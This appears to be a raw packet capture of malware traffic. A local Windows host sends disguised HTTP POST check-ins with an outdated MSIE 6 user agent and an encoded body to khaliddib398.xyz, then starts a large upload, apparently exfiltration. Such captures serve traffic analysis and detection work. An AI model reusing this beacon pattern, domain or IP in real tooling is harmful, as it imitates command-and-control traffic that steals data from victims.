2020-01-16 06:39:39.675488 IP 192.168.86.25.56301 > 23.12.144.174.80: Flags [R.], seq 2522849219, ack 478444119, win 0, length 0
E..(..@…/:..V……..P.….zWP…H………
2020-01-16 06:39:39.675860 IP 192.168.86.25.56300 > 23.12.144.174.80: Flags [R.], seq 65075930, ack 835518470, win 0, length 0
E..(..@…/9..V……..P….1…P………….
2020-01-16 06:39:39.675862 IP 192.168.86.25.56302 > 23.12.144.174.80: Flags [R.], seq 3804738166, ack 3857432750, win 0, length 0
E..(..@…/8..V……..P…v….P….<……..
2020-01-16 06:39:39.750343 IP 40.89.186.10.443 > 192.168.86.25.56291: Flags [P.], seq 940547127:940547164, ack 2485647412, win 287, length 37
E..M.p@.+.^.(Y.
..V…..8..7.’.4P…j……. ..b..f…B.;.P.sP:C..u:u.!o4._m.
2020-01-16 06:39:39.751337 IP 40.89.186.10.443 > 192.168.86.25.56291: Flags [F.], seq 37, ack 1, win 287, length 0
E..(.q@.+.^9(Y.
..V…..8…’.4P…w(……..
2020-01-16 06:39:39.751495 IP 192.168.86.25.56291 > 40.89.186.10.443: Flags [.], ack 38, win 16209, length 0
E..(..@…….V.(Y.
…..’.48..]P.?Q8………
2020-01-16 06:39:40.348332 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], ack 507, win 11, length 0
E..(.C@.+…-..:..V..P…e.j….P….x……..
2020-01-16 06:39:40.348538 IP 192.168.86.25.56313 > 45.143.138.58.80: Flags [.], ack 91639, win 0, length 0
E..(..@….’..V.-..:…P…..e.kP………….
2020-01-16 06:39:41.095474 IP 192.168.86.25.56291 > 40.89.186.10.443: Flags [R.], seq 1, ack 38, win 0, length 0
E..(..@…….V.(Y.

2020-01-16 06:42:13.506473 IP 192.168.86.25.56314 > 45.143.138.58.80: Flags [P.], seq 1:275, ack 1, win 16425, length 274: HTTP: POST /index.php HTTP/1.1
E..:.9@…….V.-..:…P….)..^P.@).2..POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: khaliddib398.xyz
Content-Length: 111
Cache-Control: no-cache

…G..0c.0d.&f.&f.&f.&g.&f.&f.&f.&f.&f.&f.Fp.4p.Gp.2p.0p.1..0a.0c.0`.&g.&f.&f.&f.G..&f.@p.G..&f.&f.&f.&f.&f.&f.
2020-01-16 06:42:13.697644 IP 45.143.138.58.80 > 192.168.86.25.56314: Flags [.], ack 275, win 11, length 0
E..(..@.+…-..:..V..P..)..^….P………….
2020-01-16 06:42:14.240164 IP 45.143.138.58.80 > 192.168.86.25.56314: Flags [.], seq 1:1461, ack 275, win 11, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.+…-..:..V..P..)..^….P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jan 2020 11:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

2020-01-16 06:42:22.681342 IP 192.168.86.25.56315 > 45.143.138.58.80: Flags [P.], seq 1:166, ack 1, win 16425, length 165: HTTP: POST /index.php HTTP/1.1
E…..@…….V.-..:…P^.Y..a..P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: khaliddib398.xyz
Content-Length: 80967
Cache-Control: no-cache